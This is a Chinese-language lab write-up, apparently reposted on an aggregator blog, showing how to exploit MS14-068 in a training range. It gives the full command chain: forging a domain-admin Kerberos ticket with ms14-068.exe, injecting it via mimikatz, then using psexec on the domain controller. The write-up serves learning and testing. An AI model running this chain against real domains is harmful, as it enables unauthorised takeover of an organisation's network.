内网渗透---ms14068

这篇具有很好参考价值的文章主要介绍了内网渗透---ms14068。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档


前言

ms14-068漏洞主要通过伪造域管的TGT,将普通用户权限提权为域管权限,以此来控制域控。只要服务器未打ms14-068补丁(KB3011780),在server 2000以上的域控服务器中,都可进行利用。


一、MS14-068的利用条件?

1、获取域普通用户的账号密码
2、获取域普通用户的sid
3、服务器未打KB3011780补丁
关于防火墙问题,在红日靶场中,未关闭域控的防火墙仍可进行利用。

二、利用步骤

本次主要使用红日靶场,为了方便,直接在win7机器中运行脚本进行展示。
win2008 域控 192.168.52.138
win2007 域机器 192.168.52.143

1.查看服务器是否打补丁

命令行输入systeminfo,查看,发下未打补丁,可以利用
内网渗透---ms14068

2.获取用户的sid值

本次使用的域用户为liumei,使用whoami /all 查询sid
内网渗透---ms14068
注意sid需要输入正确,因为无法复制,输入错了sid,导致最后导入票据仍失败访问域控。

3.删除系统票据

klist purge/mimikatz里面输入kerberos::purge(因为本机使用klist purge删除后在mimikatz里面查询发下仍存在票据,所以最后两个地方都进行了删除)
klist purge
内网渗透---ms14068
kerberos::purge(需要管理员身份运行,再提权后进行删除)
内网渗透---ms14068
之前使用红日靶场自带的liukaifeng01账号进行的测试,为了能成功运行mimikatz,所以本地设置liukaifeng01为本地管理员用户,查询此账号不是域管账号,但以管理员运行后dir可直接读到域控信息。所以最后创建了liumei账号进行的测试。

4.生成票据

直接github下载ms14-068.exe软件进行的测试(下载地址:https://github.com/ianxtianxt/MS14-068)
输入命令
ms14-068.exe -u liumei@god.org -p password -s S-1-5-21-2952760202-1353902439-2381784089-1108 -d owa.god.org
-d 参数为域控+域名称
内网渗透---ms14068
发现目录下生成TGT_liumei@god.org.ccache

5.导入票据

kerberos::ptc TGT_liumei@god.org.ccache
内网渗透---ms14068

6.提权利用

导入票据后,可重新以管理员身份打开cmd命令行(导入票据前以管理员身份运行执行dir命令显示拒绝访问),但是需要注意的是,提权后也需要以管理员运行cmd再利用,不然仍提示拒绝访问。
klist查询发现成功导入
内网渗透---ms14068

执行dir \owa\c$
内网渗透---ms14068
使用psexec执行域控命令
psexec64.exe \\owa cmd
内网渗透---ms14068
执行ipconfig,发现显示域控的ip,利用成功。


总结

以上就是今天要讲的内容,本文仅仅简单介绍了ms14-068的使用,而域控提权仍存在很多利用方式,以后慢慢学习吧。文章来源地址https://www.toymoban.com/news/detail-458456.html

到了这里,关于内网渗透---ms14068的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • web渗透、内网渗透,6个月以来的学习感受

    2022年5月,正式认识了网安这个行业,而此时的我已经34岁了,有自己的本职工作,出于浓厚的兴趣,上班之余开始了我的网安学习之路。 一、我的学习渠道: 1、花钱报班 报的哪个教育机构就不说了,现成的资料、渗透工具和网络视频教程学习起来方便,肯定比盲目的自学

    2024年02月04日
    浏览(47)
  • 内网渗透解析

    阅读本文前需要先搞懂NAT、PAT、端口映射几个概念,内网宽带中的主机可以访问公网宽带主机,反之不可以访问;公网宽带主机可以和公网宽带主机双向访问;内网宽带中的主机和内网宽带中的主机互相无法访问。那么内网宽带中的客户机和公网宽带中的客户机如何访问另一

    2024年02月11日
    浏览(32)
  • 内网渗透实战攻略

    🌈个人主页:  Aileen_0v0 🔥热门专栏:  华为鸿蒙系统学习 | 计算机网络 | 数据结构与算法 💫个人格言: \\\"没有罗马,那就自己创造罗马~\\\" 目录 介绍 什么是内网? 什么是内网渗透? 内网渗透的目的: 内网渗透常规流程: 内网渗透技术 内网渗透技术学习 读者对象 如何阅读一本

    2024年02月02日
    浏览(47)
  • 内网渗透—隧道技术

      在进行渗透测试以及攻防演练的时候,通常会存在各种边界设备、软硬件防火墙、IPS等设备来检测外部连接情况,这些设备如果发现异常,就会对通信进行阻断。   那么隧道技术就是一种绕过端口屏蔽的通信方式,在实际情况中防火墙上会设定各种安全策略,比如允许

    2024年02月08日
    浏览(51)
  • 《WEB安全渗透测试》(37) 内网渗透神器:fscan使用攻略

    Fscan是一款内网综合扫描工具,它非常的方便,一键启动,之后完全自动化、并且全方位漏洞扫描。它支持主机存活探测、端口扫描、常见服务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、web漏洞扫描、netbios探测、域控识别等功能。 这

    2024年02月13日
    浏览(40)
  • 内网渗透代理知识以及渗透某CTF三层靶机实例

            在学习完小迪内网代理安全知识后,自己也找来了案例中的CTF比赛中三层靶机,来总结一下内网代理知识。实验中成功拿到三个flag,话不多说,现在就开始。 文章目录 前言 一、 内网代理知识 二 、CTF三层靶机实例 1. 靶机拓补图 2. 攻击目标1 3.添加路由 4.开启代

    2024年02月03日
    浏览(38)
  • 内网渗透ICMP隧道搭建

    192.168.0.x模拟外网机器,1.1.1.x模拟内网机器 Linux(1.1.1.111/192.168.0.138)为WEB服务器,模拟getshell了WEB服务器的情况,通过该被控制机器将内网Windows机器(1.1.1.99)的3389远程端口映射到外网VPS(192.168.0.130)的2320端口上,黑客机器通过RDP连接192.168.0.130:2320实现远控内网Windows机器

    2024年02月16日
    浏览(42)
  • 内网渗透--vulntarget-a

    靶机链接:https://pan.baidu.com/s/11uNcZP9PFt6FAKtuCO2WpA?pwd=346n 提取码:346n 攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only 靶机:VMware Win7 IP自动获取 网卡host-Only,其他两台网络不需要设置 1.探测目标靶机开放端口和服务情况 nmap -A -sV 192.168.255.128 2.探测80端口常见漏洞 nm

    2023年04月08日
    浏览(29)
  • 红日内网渗透靶场2

    目录   环境搭建: Web渗透: weblogic漏洞利用 java反序列化漏洞利用、哥斯拉获取shell 上线msf msf派生shell到cs 内网信息收集 mimikatz获取用户密码 cs横向移动 PTT攻击(票据传递) 方法2:通过msf利用永恒之蓝以及3389端口 上线cs cs派生shell给msf fscan扫描内网 frp搭建socks5隧道代理 永

    2024年01月21日
    浏览(52)
  • 内网渗透-内置工具横向移动

    前期给大家讲了一些横向移动的知识,今天给大家讲解一下横向移动中工具的使用。 IPC+Schtasks(文件共享服务和定时任务) 利用条件: 开放了139,445端口 必须开启IPC$文件共享服务 需要目标机器的管理员账号和密码 hashdump load mimikatz 得到账号和密码 kerberos ssp wdigest net view

    2024年02月09日
    浏览(36)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包